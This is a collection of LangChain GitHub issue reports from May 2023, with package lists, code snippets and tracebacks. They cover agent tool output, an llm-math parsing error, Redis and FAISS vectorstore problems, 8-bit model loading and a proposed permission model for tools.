backcall @ file:///home/ktietz/src/ci/backcall_1611930011877/work
backoff==2.2.1
beautifulsoup4 @ file:///C:/b/abs_0agyz1wsr4/croot/beautifulsoup4-split_1681493048687/work
bleach @ file:///opt/conda/conda-bld/bleach_1641577558959/work
blinker==1.6.2
brotlipy==0.7.0
cachetools==5.3.0
certifi @ file:///C:/b/abs_4a0polqwty/croot/certifi_1683875377622/work/certifi
cffi @ file:///C:/ci_311/cffi_1676423759166/work
chardet==5.1.0
charset-normalizer @ file:///tmp/build/80754af9/charset-normalizer_1630003229654/work
chromadb==0.3.21
click==8.1.3
clickhouse-connect==0.5.22
colorama @ file:///C:/ci_311/colorama_1676422310965/work
comm @ file:///C:/ci_311/comm_1678376562840/work
commonmark==0.9.1
cryptography @ file:///C:/ci_311/cryptography_1679419210767/work
Cython==0.29.34
dataclasses-json==0.5.7
debugpy @ file:///C:/ci_311/debugpy_1676426137692/work
decorator @ file:///opt/conda/conda-bld/decorator_1643638310831/work
defusedxml @ file:///tmp/build/80754af9/defusedxml_1615228127516/work
Deprecated==1.2.13
duckdb==0.7.1
entrypoints @ file:///C:/ci_311/entrypoints_1676423328987/work
et-xmlfile==1.1.0
executing @ file:///opt/conda/conda-bld/executing_1646925071911/work
fastapi==0.95.1
fastjsonschema @ file:///C:/ci_311/python-fastjsonschema_1679500568724/work
filelock==3.12.0
frozenlist==1.3.3
fsspec==2023.4.0
ftfy==6.1.1
gitdb==4.0.10
GitPython==3.1.31
google-api-core==2.11.0
google-api-python-client==2.86.0
google-auth==2.18.0
google-auth-httplib2==0.1.0
googleapis-common-protos==1.59.0
greenlet==2.0.2
h11==0.14.0
hnswlib @ file:///D:/bld/hnswlib_1675802891722/work
httpcore==0.16.3
httplib2==0.22.0
httptools==0.5.0
httpx==0.23.3
huggingface-hub==0.14.1
idna @ file:///C:/ci_311/idna_1676424932545/work
importlib-metadata==6.6.0
ipykernel @ file:///C:/ci_311/ipykernel_1678734799670/work
ipython @ file:///C:/b/abs_d1yx5tjhli/croot/ipython_1680701887259/work
ipython-genutils @ file:///tmp/build/80754af9/ipython_genutils_1606773439826/work
ipywidgets @ file:///C:/b/abs_5awapknmz_/croot/ipywidgets_1679394824767/work
jedi @ file:///C:/ci_311/jedi_1679427407646/work
Jinja2 @ file:///C:/ci_311/jinja2_1676424968965/work
joblib==1.2.0
json5 @ file:///tmp/build/80754af9/json5_1624432770122/work
jsonschema @ file:///C:/b/abs_d40z05b6r1/croot/jsonschema_1678983446576/work
jupyter @ file:///C:/ci_311/jupyter_1678249952587/work
jupyter-console @ file:///C:/b/abs_82xaa6i2y4/croot/jupyter_console_1680000189372/work
jupyter-server @ file:///C:/ci_311/jupyter_server_1678228762759/work
jupyter_client @ file:///C:/b/abs_059idvdagk/croot/jupyter_client_1680171872444/work
jupyter_core @ file:///C:/b/abs_9d0ttho3bs/croot/jupyter_core_1679906581955/work
jupyterlab @ file:///C:/ci_311/jupyterlab_1677719392688/work
jupyterlab-pygments @ file:///tmp/build/80754af9/jupyterlab_pygments_1601490720602/work
jupyterlab-widgets @ file:///C:/b/abs_38ad427jkz/croot/jupyterlab_widgets_1679055289211/work
jupyterlab_server @ file:///C:/b/abs_e0qqsihjvl/croot/jupyterlab_server_1680792526136/work
langchain==0.0.157
lxml @ file:///C:/b/abs_c2bg6ck92l/croot/lxml_1679646459966/work
lz4==4.3.2
Markdown==3.4.3
MarkupSafe @ file:///C:/ci_311/markupsafe_1676424152318/work
marshmallow==3.19.0
marshmallow-enum==1.5.1
matplotlib-inline @ file:///C:/ci_311/matplotlib-inline_1676425798036/work
mistune @ file:///C:/ci_311/mistune_1676425149302/work
monotonic==1.6
mpmath==1.3.0
msg-parser==1.2.0
multidict==6.0.4
mypy-extensions==1.0.0
nbclassic @ file:///C:/b/abs_c8_rs7b3zw/croot/nbclassic_1681756186106/work
nbclient @ file:///C:/ci_311/nbclient_1676425195918/work
nbconvert @ file:///C:/ci_311/nbconvert_1676425836196/work
nbformat @ file:///C:/ci_311/nbformat_1676424215945/work
nest-asyncio @ file:///C:/ci_311/nest-asyncio_1676423519896/work
networkx==3.1
nltk==3.8.1
notebook @ file:///C:/b/abs_49d8mc_lpe/croot/notebook_1681756182078/work
notebook_shim @ file:///C:/ci_311/notebook-shim_1678144850856/work
numexpr==2.8.4
numpy==1.23.5
olefile==0.46
openai==0.27.6
openapi-schema-pydantic==1.2.4
openpyxl==3.1.2
packaging @ file:///C:/b/abs_ed_kb9w6g4/croot/packaging_1678965418855/work
pandas==1.5.3
pandocfilters @ file:///opt/conda/conda-bld/pandocfilters_1643405455980/work
parso @ file:///opt/conda/conda-bld/parso_1641458642106/work
pdfminer.six==20221105
pickleshare @ file:///tmp/build/80754af9/pickleshare_1606932040724/work
Pillow==9.5.0
platformdirs @ file:///C:/ci_311/platformdirs_1676422658103/work
ply==3.11
posthog==3.0.1
prometheus-client @ file:///C:/ci_311/prometheus_client_1679591942558/work
prompt-toolkit @ file:///C:/ci_311/prompt-toolkit_1676425940920/work
protobuf==3.20.3
psutil @ file:///C:/ci_311_rebuilds/psutil_1679005906571/work
pure-eval @ file:///opt/conda/conda-bld/pure_eval_1646925070566/work
pyarrow==11.0.0
pyasn1==0.5.0
pyasn1-modules==0.3.0
pycparser @ file:///tmp/build/80754af9/pycparser_1636541352034/work
pydantic==1.10.7
pydeck==0.8.1b0
Pygments @ file:///opt/conda/conda-bld/pygments_1644249106324/work
Pympler==1.0.1
pyOpenSSL @ file:///C:/b/abs_de215ipd18/croot/pyopenssl_1678965319166/work
pypandoc==1.11
pyparsing==3.0.9
PyQt5==5.15.7
PyQt5-sip @ file:///C:/ci_311/pyqt-split_1676428895938/work/pyqt_sip
pyrsistent @ file:///C:/ci_311/pyrsistent_1676422695500/work
PySocks @ file:///C:/ci_311/pysocks_1676425991111/work
python-dateutil @ file:///tmp/build/80754af9/python-dateutil_1626374649649/work
python-docx==0.8.11
python-dotenv==1.0.0
python-magic==0.4.27
python-pptx==0.6.21
pytz @ file:///C:/ci_311/pytz_1676427070848/work
pytz-deprecation-shim==0.1.0.post0
pywin32==305.1
pywinpty @ file:///C:/ci_311/pywinpty_1677707791185/work/target/wheels/pywinpty-2.0.10-cp311-none-win_amd64.whl
PyYAML==6.0
pyzmq @ file:///C:/b/abs_8b16zbmf46/croot/pyzmq_1682697651374/work
qtconsole @ file:///C:/b/abs_eb4u9jg07y/croot/qtconsole_1681402843494/work
QtPy @ file:///C:/ci_311/qtpy_1676432558504/work
regex==2023.3.23
requests @ file:///C:/b/abs_41owkd5ymz/croot/requests_1682607524657/work
rfc3986==1.5.0
rich==13.0.1
rsa==4.9
scikit-learn==1.2.2
scipy==1.10.1
Send2Trash @ file:///tmp/build/80754af9/send2trash_1632406701022/work
sentence-transformers==2.2.2
sentencepiece==0.1.99
sip @ file:///C:/ci_311/sip_1676427825172/work
six @ file:///tmp/build/80754af9/six_1644875935023/work
smmap==5.0.0
sniffio @ file:///C:/ci_311/sniffio_1676425339093/work
soupsieve @ file:///C:/b/abs_a989exj3q6/croot/soupsieve_1680518492466/work
SQLAlchemy==2.0.12
stack-data @ file:///opt/conda/conda-bld/stack_data_1646927590127/work
starlette==0.26.1
streamlit==1.22.0
sympy==1.11.1
tenacity==8.2.2
terminado @ file:///C:/ci_311/terminado_1678228513830/work
threadpoolctl==3.1.0
tiktoken==0.3.3
tinycss2 @ file:///C:/ci_311/tinycss2_1676425376744/work
tokenizers==0.13.3
toml @ file:///tmp/build/80754af9/toml_1616166611790/work
tomli @ file:///C:/ci_311/tomli_1676422027483/work
toolz==0.12.0
torch==2.0.0
torchvision==0.15.1
tornado @ file:///C:/ci_311/tornado_1676423689414/work
tqdm==4.65.0
traitlets @ file:///C:/ci_311/traitlets_1676423290727/work
transformers==4.28.1
typing-inspect==0.8.0
typing_extensions @ file:///C:/b/abs_a1bb332wcs/croot/typing_extensions_1681939523095/work
tzdata==2023.3
tzlocal==4.3
unstructured==0.6.2
uritemplate==4.1.1
urllib3 @ file:///C:/b/abs_3ce53vrdcr/croot/urllib3_1680254693505/work
uvicorn==0.22.0
validators==0.20.0
watchdog==3.0.0
watchfiles==0.19.0
wcwidth @ file:///Users/ktietz/demo/mc3/conda-bld/wcwidth_1629357192024/work
webencodings==0.5.1
websocket-client @ file:///C:/ci_311/websocket-client_1676426063281/work
websockets==11.0.2
widgetsnbextension @ file:///C:/b/abs_882k4_4kdf/croot/widgetsnbextension_1679313880295/work
wikipedia==1.4.0
win-inet-pton @ file:///C:/ci_311/win_inet_pton_1676425458225/work
wrapt==1.14.1
XlsxWriter==3.1.0
yarl==1.9.2
zipp==3.15.0
zstandard==0.21.0
### Who can help?
@vowelparrot
Hi, I facing an issue regarding llm-math tool. I am using a Tool that is created using my documents and a built-in llm tool. For some queries, llm tool receives a word problem rather than a mathematical expression. Kindly, guide how can I avoid this problem?
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
llm=OpenAI(model_name = "gpt-3.5-turbo", temperature = 0) # text-davinci-003
db = Chroma(persist_directory="db_publications",embedding_function=embedding)
chain = RetrievalQA.from_chain_type(llm=llm, chain_type="stuff", retriever=db.as_retriever(search_kwargs={"k": 2}))
#custom tool is created using my documents
custom_tool = [
Tool(
name="Tax_Tool",
func=chain.run,
description="Use this tool to answer tax related queries") ]
# built-in tools are loaded
tools = load_tools(["llm-math"], llm=llm)
# built-in tools are appended to the custom tool to maintain priority
for tool in tools:
custom_tool.append(tool)
# Finally, let's initialize an agent with the tools, the language model, and the type of agent we want to use.
agent = initialize_agent(
custom_tool, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True)
# Now let's test it out!
result = agent(
{"input" : "I am married and filing jointly. How much additional Medicare Tax I have to pay if my net earnings are $300,000?"}
)
```
### Expected behavior
←[1m> Entering new AgentExecutor chain...←[0m
←[32;1m←[1;3mI need to use a tax calculator to determine the additional Medicare Tax.
Action: Calculator
Action Input: Input $300,000 and select the option for married filing jointly.←[0m2023-05-18 14:15:59.978 Uncaught app exception
Traceback (most recent call last):
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\llm_math\base.py", line 80, in _evaluate_expression
numexpr.evaluate(
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\numexpr\necompiler.py", line 817, in evaluate
_names_cache[expr_key] = getExprNames(ex, context)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\numexpr\necompiler.py", line 704, in getExprNames
ex = stringToExpression(text, {}, context)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\numexpr\necompiler.py", line 274, in stringToExpression
c = compile(s, '<expr>', 'eval', flags)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<expr>", line 1
None (this is not a math problem)
^^^^^^^^^^^^^^^^^^
SyntaxError: invalid syntax. Perhaps you forgot a comma?
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 565, in _run_script
exec(code, module.__dict__)
File "D:\Projects\TaxAdvisor\TaxAdviorWithNewDb\agent_gpt_without_observations.py", line 159, in <module>
result = agent(
^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 140, in __call__
raise e
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 134, in __call__
self._call(inputs, run_manager=run_manager)
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\agents\agent.py", line 922, in _call
next_step_output = self._take_next_step(
^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\agents\agent.py", line 800, in _take_next_step
observation = tool.run(
^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\tools\base.py", line 255, in run
raise e
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\tools\base.py", line 249, in run
self._run(*tool_args, run_manager=run_manager, **tool_kwargs)
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\tools\base.py", line 344, in _run
self.func(
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 236, in run
return self(args[0], callbacks=callbacks)[self.output_keys[0]]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 140, in __call__
raise e
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 134, in __call__
self._call(inputs, run_manager=run_manager)
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\llm_math\base.py", line 149, in _call
return self._process_llm_result(llm_output, _run_manager)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\llm_math\base.py", line 103, in _process_llm_result
output = self._evaluate_expression(expression)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\llm_math\base.py", line 87, in _evaluate_expression
raise ValueError(
ValueError: LLMMathChain._evaluate("
None (this is not a math problem)
") raised error: invalid syntax. Perhaps you forgot a comma? (<expr>, line 1). Please try again with a valid numerical expression
| llm-math Tools takes a word problem rather than a numerical expression. | https://api.github.com/repos/langchain-ai/langchain/issues/4917/comments | 3 | 2023-05-18T09:20:29Z | 2023-12-11T20:49:37Z | https://github.com/langchain-ai/langchain/issues/4917 | 1,715,302,612 | 4,917 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I use two agents, the same LLM, why is one Observation the output of the tool and the other not. **How to make the output of Observation the return result of TOOL**
```python
class CustomAgentExecutor(object):
def __init__(self, template: str, tools: List[BaseTool], llm):
self.template = template
self.tools = tools
self.llm = llm
self.agent_executor = self._initialize_executor()
def _initialize_executor(self):
prompt = CustomPromptTemplate(
template=self.template,
tools=self.tools,
input_variables=["input", "intermediate_steps"]
)
'''
# ONE AGENT
tool_names = [tool.name for tool in self.tools]
output_parser = CustomOutputParser(tool_names=tool_names)
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
agent = LLMSingleActionAgent(
llm_chain=llm_chain,
output_parser=output_parser,
stop=["\\nObservation:"],
allowed_tools=tool_names
)
return AgentExecutor.from_agent_and_tools(agent=agent, tools=self.tools, verbose=True)
'''
# ANOTHER AGENT
agent_chain = initialize_agent(
self.tools,
self.llm,
agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION,
verbose=True
)
return agent_chain
def run(self, input_question: str):
return self.agent_executor.run(input_question)
```
```python
custom_agent_executor = CustomAgentExecutor(
template=self.template,
tools=self.tools,
llm=self.llm
)
result = custom_agent_executor.run(input_question=instruction)
```
```text
> Entering new AgentExecutor chain...
I need to figure out what month and day it is today.
Action: Time
Action Input: Current Date
Observation: 今天的日期是: 2023年05月18日, 当前的时间是: 03时29分03秒, 今天是星期四
Thought: I now know the final answer
Final Answer: 今天是五月十八号。
> Finished chain.
```
```text
> Entering new AgentExecutor chain...
Thought: 我需要知道当前的日期
Action: Time
Action Input: 当前日期
Observation: 今天是7月14号
Thought: 我现在知道最终答案
Final Answer: 今天是7月14号
> Finished chain.
```
**今天的日期是: 2023年05月18日, 当前的时间是: 03时29分03秒, 今天是星期四 【this is the return result of the tool】**
### Suggestion:
_No response_ | Issue: How to make the output of Observation the return result of TOOL | https://api.github.com/repos/langchain-ai/langchain/issues/4916/comments | 10 | 2023-05-18T07:52:21Z | 2024-02-15T16:11:50Z | https://github.com/langchain-ai/langchain/issues/4916 | 1,715,187,690 | 4,916 |
[
"hwchase17",
"langchain"
]
| ### Feature request
# Example
I have a tool that has access to my email. This tool is used by a long running agent. I'd like the tool to have long standing Read permissions but only have short lived Write permissions.
Like Githubs sudo permission, I'd like a message sent to a designated device, email, or similar, asking for authorization.
# Reality
Some of these actions maybe outside the design scope of LangChain. However, my mind goes towards a refining of the _run method within a tool. The _run method could accept an object which is responsible for getting approval or simply returning true.
As a pattern I think of dependency injection more than callbacks but wonder if that could work or it is just semantic difference.
### Motivation
Motivation is simply to secure the use of tools. After regulation of the underlying LLMs I think this is the next largest risk.
I think it talks to ~~Ben (sorry I forget his surname)~~ EDIT: got the gents name wrong, his name is Simon Wilson ( https://simonwillison.net/2023/May/2/prompt-injection-explained/) recent concerns and suggestion to have two LLMs, one freely accessible the other privileged and has input sanitized.
There is a lot of value in the thought and pattern, it feels more practical to start with permissions, especially in a "zero trust world".
### Your contribution
Happy to help in multiple ways, time based.
Immediately to discuss and document the risks, threats, and previous solutions.
Immediately to peer review MRs.
Mid-Longer term (i.e. on the back of a decent to do list) start to code a solution. | Add permission model to tools (simple sudo like at first) | https://api.github.com/repos/langchain-ai/langchain/issues/4912/comments | 5 | 2023-05-18T06:31:01Z | 2023-12-31T13:20:34Z | https://github.com/langchain-ai/langchain/issues/4912 | 1,715,084,795 | 4,912 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
ERROR: Could not find a version that satisfies the requirement langchain==0.0.172 (from versions: 0.0.1, 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7, 0.0.8, 0.0.9, 0.0.10, 0.0.11, 0.0.12, 0.0.13, 0.0.14, 0.0.15, 0.0.16, 0.0.17, 0.0.18, 0.0.19, 0.0.20, 0.0.21, 0.0.22, 0.0.23, 0.0.24, 0.0.25, 0.0.26, 0.0.27, 0.0.28, 0.0.29, 0.0.30, 0.0.31, 0.0.32, 0.0.33, 0.0.34, 0.0.35, 0.0.36, 0.0.37, 0.0.38, 0.0.39, 0.0.40, 0.0.41, 0.0.42, 0.0.43, 0.0.44, 0.0.45, 0.0.46, 0.0.47, 0.0.48, 0.0.49, 0.0.50, 0.0.51, 0.0.52, 0.0.53, 0.0.54, 0.0.55, 0.0.56, 0.0.57, 0.0.58, 0.0.59, 0.0.60, 0.0.61, 0.0.63, 0.0.64, 0.0.65, 0.0.66, 0.0.67, 0.0.68, 0.0.69, 0.0.70, 0.0.71, 0.0.72, 0.0.73, 0.0.74, 0.0.75, 0.0.76, 0.0.77, 0.0.78, 0.0.79, 0.0.80, 0.0.81, 0.0.82, 0.0.83, 0.0.84, 0.0.85, 0.0.86, 0.0.87, 0.0.88, 0.0.89, 0.0.90, 0.0.91, 0.0.92, 0.0.93, 0.0.94, 0.0.95, 0.0.96, 0.0.97, 0.0.98, 0.0.99rc0, 0.0.99, 0.0.100, 0.0.101rc0, 0.0.101, 0.0.102rc0, 0.0.102, 0.0.103, 0.0.104, 0.0.105, 0.0.106, 0.0.107, 0.0.108, 0.0.109, 0.0.110, 0.0.111, 0.0.112, 0.0.113, 0.0.114, 0.0.115, 0.0.116, 0.0.117, 0.0.118, 0.0.119, 0.0.120, 0.0.121, 0.0.122, 0.0.123, 0.0.124, 0.0.125, 0.0.126, 0.0.127, 0.0.128, 0.0.129, 0.0.130, 0.0.131, 0.0.132, 0.0.133, 0.0.134, 0.0.135, 0.0.136, 0.0.137, 0.0.138, 0.0.139, 0.0.140, 0.0.141, 0.0.142, 0.0.143, 0.0.144, 0.0.145, 0.0.146, 0.0.147, 0.0.148, 0.0.149, 0.0.150, 0.0.151, 0.0.152, 0.0.153, 0.0.154, 0.0.155, 0.0.156, 0.0.157, 0.0.158, 0.0.159, 0.0.160, 0.0.161, 0.0.162, 0.0.163, 0.0.164, 0.0.165, 0.0.166)
ERROR: No matching distribution found for langchain==0.0.172
### Suggestion:
_No response_ | Issue: Could not find a version that satisfies the requirement langchain==0.0.172 | https://api.github.com/repos/langchain-ai/langchain/issues/4909/comments | 1 | 2023-05-18T06:02:43Z | 2023-05-26T10:46:41Z | https://github.com/langchain-ai/langchain/issues/4909 | 1,715,042,505 | 4,909 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: latest
environment: latest Google collab
### Who can help?
@eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [x] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
You can see the issue here: https://colab.research.google.com/drive/1WaW5WAHTN7xlfo_jK9AnnpjfvVSQITqe?usp=sharing
Step 0. Install `faiss-cpu`
Step 1. Load a large model that takes up most of the GPU memory
Step 2. Call FAISS.from_documents
Step 3. Error out with OutOfMemoryError: CUDA out of memory.
### Expected behavior
* We're using `faiss-cpu`, so the expectation is that all FAISS ops are on the CPU
* However, we get GPU OutOfMemoryErrors when trying to shove docs into the vector store, so 🤷 | faiss-cpu uses GPU | https://api.github.com/repos/langchain-ai/langchain/issues/4908/comments | 3 | 2023-05-18T05:29:31Z | 2024-06-07T07:35:21Z | https://github.com/langchain-ai/langchain/issues/4908 | 1,715,007,824 | 4,908 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I would like to receive a prompt and depending on the prompt route to a dataframe agent or a llmchain. For example, the question may be about the aggregation of data in which I would like to utilize the dataframe agent. If the question is about pdf files I would like to use the llmchain to handle this.
### Motivation
The ability to have a universal answer flow is ideal for my scenario. I would like the ability to handle any question and respond with either a response from the dataframe or from llmchain.
### Your contribution
I am still going through the documentation and code repo itself. I can certainly work towards a PR. Want to for sure ensure that this is not already possible. Thank you! | Allow for routing between agents and llmchain | https://api.github.com/repos/langchain-ai/langchain/issues/4904/comments | 16 | 2023-05-18T04:51:16Z | 2024-04-20T16:20:33Z | https://github.com/langchain-ai/langchain/issues/4904 | 1,714,977,472 | 4,904 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am using a next.js app for this
Code Used:
```
import { OpenAI } from 'langchain/llms/openai';
import { LLMChain } from "langchain/chains";
import { PromptTemplate } from "langchain/prompts";
const model = new OpenAI({
openAIApiKey: process.env.OPENAI_API_KEY,
temperature: 0, // increase temepreature to get more creative answers
modelName: 'gpt-3.5-turbo', //change this to gpt-4 if you have access
});
const prompt = PromptTemplate.fromTemplate(
template
);
const query = new LLMChain({ llm: model, prompt: prompt });
```
Using "openai": "^3.2.1",
Module parse failed: Unexpected character '' (1:0)
The module seem to be a WebAssembly module, but module is not flagged as WebAssembly module for webpack.
BREAKING CHANGE: Since webpack 5 WebAssembly is not enabled by default and flagged as experimental feature.
You need to enable one of the WebAssembly experiments via 'experiments.asyncWebAssembly: true' (based on async modules) or 'experiments.syncWebAssembly: true' (like webpack 4, deprecated).
For files that transpile to WebAssembly, make sure to set the module type in the 'module.rules' section of the config (e. g. 'type: "webassembly/async"').
(Source code omitted for this binary file)
Import trace for requested module:
../../../node_modules/@dqbd/tiktoken/tiktoken_bg.wasm
../../../node_modules/@dqbd/tiktoken/tiktoken.js
../../../node_modules/langchain/dist/base_language/count_tokens.js
../../../node_modules/langchain/dist/llms/openai.js
../../../node_modules/langchain/llms/openai.js
./app/utils/makechain.ts
./app/utils/quer.ts
./app/test/page.tsx
The code was working smoothly last night and it broke all sudden
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code Used:
```
import { OpenAI } from 'langchain/llms/openai';
import { LLMChain } from "langchain/chains";
import { PromptTemplate } from "langchain/prompts";
const model = new OpenAI({
openAIApiKey: process.env.OPENAI_API_KEY,
temperature: 0, // increase temepreature to get more creative answers
modelName: 'gpt-3.5-turbo', //change this to gpt-4 if you have access
});
const prompt = PromptTemplate.fromTemplate(
template
);
const query = new LLMChain({ llm: model, prompt: prompt });
```
### Expected behavior
The code should run smoothly and return a query
| Module parse failed: Unexpected character '' (1:0) The module seem to be a WebAssembly module, but module is not flagged as WebAssembly module for webpack | https://api.github.com/repos/langchain-ai/langchain/issues/4901/comments | 1 | 2023-05-18T04:09:27Z | 2023-05-18T05:18:59Z | https://github.com/langchain-ai/langchain/issues/4901 | 1,714,950,417 | 4,901 |
[
"hwchase17",
"langchain"
]
| ### System Info
Hi @hwchase17 @agola11
In the langchain v0.0.171 there is not feature to load 8 bit models because specifying it requires `device_map = auto` to be set which I am unable to set in the [HuggingFacePipeline](https://github.com/hwchase17/langchain/blob/master/langchain/llms/huggingface_pipeline.py)
For clarity I am trying to load 8 bit model in order to save memory and load model faster, if that's achievable
```
---> 64 task="text-generation", model_kwargs={"temperature":0, "max_new_tokens":256, "load_in_8bit": True, device_map:'auto'})
66 chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_1", verbose=True)
68 prompt_template = """<my prompt>:
69 Context: {nda_1}
70 NDA:"""
NameError: name 'device_map' is not defined
```
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
---> 64 task="text-generation", model_kwargs={"temperature":0, "max_new_tokens":256, "load_in_8bit": True, device_map:'auto'})
66 chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_1", verbose=True)
68 prompt_template = """<my prompt>:
69 Context: {nda_1}
70 NDA:"""
NameError: name 'device_map' is not defined
```
### Expected behavior
model must load faster | loading 8 bit models and throwing device_map = auto errors | https://api.github.com/repos/langchain-ai/langchain/issues/4900/comments | 1 | 2023-05-18T03:37:36Z | 2023-06-03T18:38:23Z | https://github.com/langchain-ai/langchain/issues/4900 | 1,714,929,586 | 4,900 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
Python 3.10.4
langchain==0.0.171
redis==4.5.5
redisearch==2.1.1
```
### Who can help?
@tylerhutcherson
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I was able to override #4896 by getting rid of the extra `cls` from the mentioned method. Post which, I'm getting this below error. Ideally `from_texts_return_keys` method should not be expecting `redis_url` to be passed in as a kwarg since the `redis_url` is defined during the initialization of the `Redis` class and is a mandatory argument.
```
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/vectorstores/redis.py", line 448, in from_texts
instance, _ = cls.from_texts_return_keys(
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/vectorstores/redis.py", line 389, in from_texts_return_keys
redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL")
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/utils.py", line 17, in get_from_dict_or_env
return get_from_env(key, env_key, default=default)
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/utils.py", line 27, in get_from_env
raise ValueError(
ValueError: Did not find redis_url, please add an environment variable `REDIS_URL` which contains it, or pass `redis_url` as a named parameter.
```
### Expected behavior
The method `from_texts_return_keys` should not expect the `redis_url` to be passed in as a kwarg. | Redis Vectorstore: Did not find redis_url, please add an environment variable `REDIS_URL` which contains it, or pass `redis_url` as a named parameter. | https://api.github.com/repos/langchain-ai/langchain/issues/4899/comments | 5 | 2023-05-18T03:15:21Z | 2023-09-19T16:10:11Z | https://github.com/langchain-ai/langchain/issues/4899 | 1,714,917,051 | 4,899 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain="^0.0.172"
The `from langchain.callbacks import get_openai_callback` callback seems to have broken in a new release. It was working when I was on "^0.0.158". The callback is working but no token or costs are appearing.
```
2023-05-18T02:41:37.844174Z [info ] openai charges [service.openai] completion_tokens=0 prompt_tokens=0 request_id=4da70135655b48d59d7f1e7528733f61 successful_requests=1 total_cost=0.0 total_tokens=0 user=user_2PkD3ZUhCdmBHiFPNP9tPZr7OLA
```
